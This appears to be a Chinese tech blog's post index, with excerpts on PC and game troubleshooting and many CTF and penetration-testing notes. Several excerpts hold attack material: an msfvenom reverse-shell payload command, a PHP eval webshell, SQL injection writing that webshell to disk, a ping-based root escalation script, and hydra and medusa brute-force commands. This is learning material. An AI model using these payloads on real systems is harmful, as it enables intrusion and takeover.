- 博客(89)
- 收藏
- 关注
RSS订阅原创 小白萌新笔记——鼠标失灵
情况一:鼠标本身点击控制面板进入硬件管理点击鼠标先查看是否是鼠标本身有问题解决方法:更换鼠标查看是否还存在问题!1.然后可以选择拆开鼠标然后试试用布蘸点酒精清理滚动球锁片灰尘和鼠标轴,然后重新复位2.可能是鼠标内部的损坏(如碗形接触片断裂),要么拿去修要么更换情况二:usb接触不良解决方法:可以换其他的usb接口,然后看看是否还存在问题。情况三:usb供电不足打开计算机管理找到你鼠标的USB Root HubUSB Root Hub是根集线器,也就是是USB控制器的
2021-09-08 12:30:24
2618
原创 unity的常见错误处理
黄色提示:文件丢失第一种情况:显示文件丢失,就去把文件拖到丢失的目录下。第二种情况:代码错误,无法识别。一般是调用的参数打错。红色提示:无法识别
2021-08-21 19:57:43
4500
原创 unity出现无法分配新guid,因为资源位于不可变文件夹中。该资产将被忽略。解决方案
当unity出现下列代码的情况时we can't assign a new guid because the asset is in an immutable folder. the asset will be ignored.去文件目录下,你的游戏文件不是unity的找到这个文件删掉就可以了(后面还原之后,问题也消失了,就很神奇)...
2021-08-20 21:55:10
5791
4
原创 关于我unity创建2d横版游戏的这件事1
首先插入图片随便画的不要在意修改像素数然后我们就会多出一个背景层这个是摄像层可以理解为游戏显示的区域继续完善添加其他图层添加人物组件,使人物更加生动给地图也添加组件做到这里可以先点击游戏界面,然后点击开始测试如果人物可以落在地上而不是穿过就说明穿成功了。...
2021-08-20 21:30:37
254
原创 下载网页视频方法
Google方法一F12或者点击视频里面设置保存打开网页点击F12会弹出下图的页面里的弹框我们可以在搜索栏里面输入视频后缀名进行搜索文件常见的视频后缀名avi flv mp4 vo dat avi rm rmvb mpg mov mkv然后我们可以根据视频大小来判断哪个是自己需要下载的文件方法二利用Google的扩展程序Video Downloader来下载当你打开视频或者扩展程序发现视频时会出现图标当然也可以直接点击同理fixfox也同样适用如遇到特殊情况即无法识别
2021-08-03 14:42:20
6184
原创 网上的PS把图片变清晰的原理
首先说下模糊和清晰的区别模糊是因为图片的像素被破坏,这种是不可逆的。网上所谓的锐化清晰,其实是将图片的亮度进行了调节。锐化:聚焦模糊边缘,提高图像中某一部位的清晰度或者焦距程度,使图像特定区域的色彩更加鲜明。 然后图片质感会发生变化,你们就会感觉图片变了。而且因为颜色显的更加亮变误以为清晰。...
2021-06-28 21:00:46
1875
1
原创 图片处理兼职指南
了解行业详情一.版权问题你使用的字体要有版权,或者不侵权(因为这是商用的)后果具体参考当年方正的微软雅黑侵权事件,赔偿两千多万。如果不知道是否侵权和想查询可以去百度或者360字体查询。一般来说电商大部分都是阿里的平台,阿里平台是有一定的授权字体的。二.工具按照需求下工具(1)Photoshop(PS必要)一般用来做抠图和精修行业内90%都在使用!(2)CINEMA 4D(C4D非必要)拥有多个模块和粒子系统,可以模块来组合需要的模型一般用来建模,例如某些图片需要搭建场景来获取素材A
2021-06-27 22:32:42
395
原创 网络空间安全(羊)2
扫描靶机 netdiscover -r 靶机IP网段nmap -sV 靶机IP发现了80端口,可能存在网页我们通过dirb对靶机进行隐藏网页进行探查dirb http://靶机IP:端口发现一个网页打开需要用户名和密码我们优先进行弱密码和判断是否存在注入点启动burpsuite,修改设置创建监听端口进入burpsuite,修改监听端口或者创建add开启监听输入用户和密码,把数据导入到Repeater判断是否存在注入点发现密码处出现明显的改变,存
2021-06-17 22:12:13
619
3
原创 网络空间安全(羊)实战实例
扫描靶机 netdiscover -r 靶机IP网段nmap -sV 靶机IP发现了80端口,可能存在网页我们通过dirb对靶机进行隐藏网页进行探查dirb http://靶机IP:端口发现一个网页打开需要用户名和密码我们优先进行弱密码和判断是否存在注入点启动burpsuite,修改设置创建监听端口进入burpsuite,修改监听端口或者创建add开启监听输入用户和密码,把数据导入到Repeater判断是否存在注入点发现密码处出现明显的改变,存
2021-06-17 21:15:43
698
2
原创 网络空间安全大杂烩
ms17-010一通过本地PC中渗透测试平台Kali对靶机场景Server9进行系统服务及版本扫描渗透测试,以xml格式向指定文件输出信息(使用工具Nmap),将以xml格式向指定文件输出信息必须要使用的参数作为flag值提交Nmap –sS –Pn –A –oX Target IP答案-ox二在本地PC的渗透测试平台Kali中,使用命令初始化MSF数据库并将此命令作为flag值提交msfdb init三在本地PC的渗透测试平台Kali中,打开MSF,使用db_import将扫描结果
2021-06-16 09:31:54
1664
原创 steam拷贝游戏无法检测到解决方法
拷贝时我们一般都是直接把"common"目录下的游戏文件直接拷贝steam识别游戏其实并不是按照游戏目录下的文件来识别的。 它主要是识别acf文件来查看库里面的游戏acf文件在common的上一级目录“steamapps”里面后面的数字代表游戏ID一般我们拷贝文件时需要将游戏本体以及上级目录下的acf文件一起拷贝,有时需要把steamapps上级目录下的steam.dll文件一起拷贝。视情况来定。一般来说acf文件是用户登录steam后产生的,它是证明该用户的库里面是否拥有该游戏。当然如
2021-06-02 14:18:46
13366
1
原创 关于求生之路2游戏出现索引缓冲区的索引太多解决方案
一般来说游戏的缓冲区会有一定的索引空间,如果你使用太多的mod,游戏就必须创建多于游戏引擎能够处理的纹理,而它的超过了索引空间的大小时就会出现问题。这称为缓冲区溢出正如你也可以在你的日志文件中看到,当它告诉你“索引缓冲区的索引太多告诉程序员x>32768”。X是一个大于2^15的数。建议mod不要对于50个或者体积之和不要太大。不要下过大或者容易冲突的文件。这里列出一般来说问题的存在点1.地图的问题,地图存在bug(一般来说都是)2.HQ模型(角色和僵尸模型)/纹理过大因为它们有更多的.
2021-05-25 16:27:03
14657
6
原创 关于如何利用Kail下载windows文件
方法一制作一个exe的监听木马windows 靶机msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=Kail的IP lport=监听端口 -f exe >2.exe然后上传到kail的网页那如果没开启服务就开启开启apache2服务service apache2 startservice apache2 status 查看是否开启mv 2.exe /var/www/html然后windows下载exe或者Kail上传
2021-05-07 20:13:26
558
1
原创 一句话木马详细解说
一句话木马<?php @eval($_GET[cmd]);?><?phpphp文件头?>@屏蔽错误如果加上就是不显示错误信息不然就会显示Warning:.....Warning:.....Warning:.....eval这是一个函数它会把后面括号的代码当做php代码运行。这是一个危险函数,一般网站会把它过滤屏蔽。$这是一个变量源名GET获取表单POST也是获取表单,不过它会进行加密。使别人无法看到。cmd一个参数,到时候连
2021-04-26 20:52:18
1274
1
原创 当群星游戏打开显示无法访问Documents库的解决方案
原因可能是电脑中毒或者误删移动了Documents(文档)这个文件夹,文档变成快捷方式或者已经删掉了。如存在快捷方式可查看其对应路径。发现其对应D盘下的Documents(文档)文件夹。我们就去D盘新建一个名为Documents或者叫做文档的文件夹。如果找不到D盘,只有C、E、F盘这样奇怪的顺序。那么就是你盘符出问题。前往计算机管理的磁盘管理更改。主要!找到库!然后右键文档属性添加文档路径,当然你可以设置其他路径。将文档添加进去完成后即可解决。温馨提醒,切勿手抖。看不懂的东西
2021-04-25 21:34:47
4930
原创 当你安装splunk出现no key时
后面加上 --force --nodepsrpm -ivh splunk-8.0.0-1357bef0a7f6-linux-2.6-x86_64.rpm --force --nodeps
2021-04-18 20:30:28
218
原创 CTF-SQL注入(GET)图文讲解
首先进行靶机发现netdiscover -r 靶机IP网段发现靶机192.168.1.115进行nmap扫描版本号nmap -sV 192.168.1.115扫描隐藏内容dirb http://192.168.1.115:80发现登录界面index.php使用kail自带的http扫描工具owasp—zap进入界面后输入靶机IP,点击攻击点击警报,发现存在SQL注入...
2021-03-19 14:42:59
1215
原创 CTF-网页上传题
1.根据下方代码上传名为1.php的文件$is_upload = false;$msg = null;if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type']
2021-03-18 11:50:36
1698
原创 抓包必记
kail解压unzip 压缩包 -u拆包binwalk -e 文件16机制编写vi%!xxdJPEG (jpg) 文件头:FFD8FF 文件尾:FF D9 PNG (png) 文件头:89504E47 文件尾:AE 42 60 82GIF (gif) 文件头:47494638 文件尾:00 3B...
2021-03-17 16:41:45
210
原创 ctf图文讲解-FTP后门服务利用
首先进行靶机发现netdiscover -r 靶机IP网段发现靶机,对靶机进行操作系统版本扫描nmap -sV 靶机IP发现21端口版本号为 ProFTPD 1.3.3c通过searchsploit查看对应版本号漏洞文件searchsploit ProFTPD 1.3.3c查看文件cat /usr/share/exploitdb/exploits/linux/remote/15662.txt很多情况下我们可以通过这些文件来判断如何去进行攻击,kail大多数都是把攻击方法
2021-03-17 16:06:30
646
原创 Linux查看添加移出用户组
groups 用户查看用户所属组usermod -a -G 组名 用户将用户添加进组gpasswd -d 用户 组将用户移出组
2021-03-16 09:08:26
764
原创 SQL手工注入
启动burpsuite监听网页在监听到的页面右键点击Send to Repeater然后跳转到Repeater在输入框输入【 ‘ 】测试是否存在注入点对username,password进行一个个试。如果存在会返回界面会不一样。当我们找到注入点可以进行字符串猜解长度‘order by 4# 报错‘order by 3#页面正常有3个字段‘union select “”,””,”<?php eval($_GET[cmd]);?>” into outfile “/var/
2021-03-15 11:51:48
229
原创 CTF图文讲解-smb渗透测试
扫描靶机发现靶机172.16.101.38对靶机进行开发=放端口及版本号扫描,获取有用的信息。发现22(ssh),80(http),445和139(smb),3306(mysql)首先我们讲一下什么是SMB协议SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。
2021-03-08 21:21:31
1224
原创 linux普通用户提权至root用户脚本
注,由于脚本是利用/bin/ping漏洞实现提权,如果没有就无法实现。如vi 2.shunset LD_AUDITrm -r -f /tmp/exploitmkdir /tmp/exploitln /bin/ping /tmp/exploit/targetexec 3< /tmp/exploit/targetls -l /proc//fd/3rm−rf/tmp/exploitls−l/proc//fd/3rm -rf /tmp/exploitls -l /proc//fd/3rm
2021-03-04 22:20:24
639
1
原创 CTF-SSH服务渗透代码详细解说
首先,我们先理解什么是SSH协议SSH是(Secure SHell protocol) 的简写,即(安全外壳协议)。由 IETF 的网络小组(Network Working Group)制定。以前我们都是使用rsh和telnet的明文传输,这样的话登录时的ID和密码数据就会直接在网络上暴露,相当于你在网络上被别人看的一清二楚。存在安全上的问题。而SSH提供了加密、校验和压缩,使得我们可以很安全的进行远程操作。不过这并不是绝对的,总有加密文件被破解的一天。但是相对与明文加密,这样还是好很多的。毕竟有密码和
2021-03-01 19:58:43
1001
原创 CTF-SSH私钥泄露代码详细解说
nmap -sV 172.16.101.61扫描靶机的端口以及开启服务若发现31337/tcp open http Werkzeug httpd 0.11.15 (pYTHON 3.5.3)特殊端口31337端口服务开启此时我们可以探测大端口的信息可以通过http://ip:port的形式访问靶机,查看其源代码另外,还可以通过使用工具来探测隐藏页面-dirb http://ip:port/一般来讲探测之后会发现很多隐藏文件,那么我们可以通过他们来进一步进行渗透。讲解一下:如果发现了以
2021-02-26 09:08:57
780
原创 centos查看当前用户
centos查看当前用户users列出用户who列出当前已登录用户如果只希望累出用户使用该语句who |cut -d ’ ’ -f1 |sort|uniqid -u。 显示当前登入用户的用户名称,以及当前使用的tty信息,且包括用户名,tty名,当前时间日期,当前用户使用的链接地址...
2021-02-25 22:19:09
3859
原创 nmap大全
nmap -sp查找多线程-PN FIN服务-PB ack和ICMP一起扫描-sX 圣诞树-sR RPC扫描-sS半开放式-sV 版本号-iflist 查看本地路由及端口-sU UDP服务-Pn 跳过防火墙强制扫描。因为有些防火墙禁止ping,所以绕过ping-n:不用解析域名。-F:快速扫描。-A:综合扫描。-oX 输出xml-OA 输出扫描所有文件-p:端口{-数 数以内 数- 大于数p-所有 U udp T tcp 服务 [数-数]端口}。-O:操作系统扫描。-sP -
2021-02-25 22:14:12
440
原创 apache版本号渗透
apache版本号渗透 nikto -h 192.168.1.180 查看数据库版本号 select version (); 内核版本号 uname -r 数据库版本号 rpm -qa |grep php
2021-02-25 22:11:10
492
原创 find / -perm -4000 2>/dev/null的拆分讲解
chmod给文件提权(600) 只有拥有者有读写权限。(644) 只有拥有者有读写权限;而属组用户和其他用户只有读权限。(700) 只有拥有者有读、写、执行权限。(755) 拥有者有读、写、执行权限;而属组用户和其他用户只有读、执行权限。(711) 拥有者有读、写、执行权限;而属组用户和其他用户只有执行权限。(666) 所有用户都有文件读、写权限。(777) 所有用户都有读、写、执行权限。find / -perm -4000 2>/dev/n
2021-02-25 21:44:08
2413
原创 当win10电脑,本地网络出现了一个意外的情况,不能完成所有你在设置中所要求的更改?
方法一:一般来说都是VMware的安装导致注册表出现问题。要想解决就要修复注册表(可以去下载一个CCleaner去设置里修改为中文,在注册表分页选择扫描问题,修复问题就好了)方法二:在WIN10左下角的搜索中,找到cmd ,单机击右键以管理员身份运行。然后输入netsh interface ip set address “以太网” static 192.168.1.12 255.255.255.0 192.168.1.1完成后,回车。192.168.1.12是ip地址255.255.255.
2021-02-23 14:51:21
18175
10
原创 centos忘记密码找回原密码(不用改),eoot密码解密
进入/etc/shaow选择root:后一串字符串将字符串/后面的去掉将剩下的拿去进行解密md5如果不行多试几次有时识别不出来如果有进行过其他加密要进行hash等其他解密
2021-01-09 22:14:18
625
原创 网络空间安全技术攻防操作步骤
攻写对应开启的各端口服务漏洞脚本nmap扫描靶机尝试密码爆破寻找漏洞服务连接防加固centos服务netstat -nlpt检查开放端口kill -9杀掉无关后台端口对开启端口进行加固修改配置文件修改数据库密码删除多余用户,和修改密码...
2020-10-11 10:41:59
900
原创 centos查看当前用户的命令
centos查看当前用户users列出用户who列出当前已登录用户如果只希望累出用户使用该语句who |cut -d ’ ’ -f1 |sort|uniqid -un显示当前登入用户的用户名称,以及当前使用的tty信息,且包括用户名,tty名,当前时间日期,当前用户使用的链接地址...
2020-09-29 17:01:23
1424
原创 kail里面的美杜莎和九头蛇的利用
九头蛇和美杜莎九头蛇hydra -l root -P passwd.txt -t 5 -v 172.16.102.250 mysql使用九头蛇对靶机数据库进行密码爆破,使用passwd.txt脚本-L 用户字典 -l 用户美杜莎medusa -M mysql -u root -P passwd.txt -h 172.16.102.250使用美杜莎对靶机数据库进行密码爆破。使用passwd.txtmysql -u root -p...
2020-09-29 16:54:48
1488
原创 wirshark常用过滤使用方法
Wireshark常用过滤使用方法过滤源ip、目的ip。查看图片ftp找木马mysql查版本号找数据库,ftp查看主机名telnet查找黑客ip用tcp.connection.syn查看黑客对服务器暴力破解tcp.connection.syn and ip.src ==(ip)在wireshark的过滤规则框Filter中输入过滤条件。如查找目的地址为192.168.101.8的包,ip.dst192.168.101.8;查找源地址为ip.src1.1.1.1[image::::41:::
2020-09-29 16:26:24
771
原创 ssh爆破进入用户界面后的教程
SSH爆破进入用户界面后爆破密码和用户adduser admin创建用户passwd admin创建密码usermod -g root admin提权至root详情编译C+程序gcc -o后台运行后面加&netcat远程打开/bin/sh程序,并运行查看IP地址命令/sbin/ifconfig...
2020-09-29 16:23:48
247
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人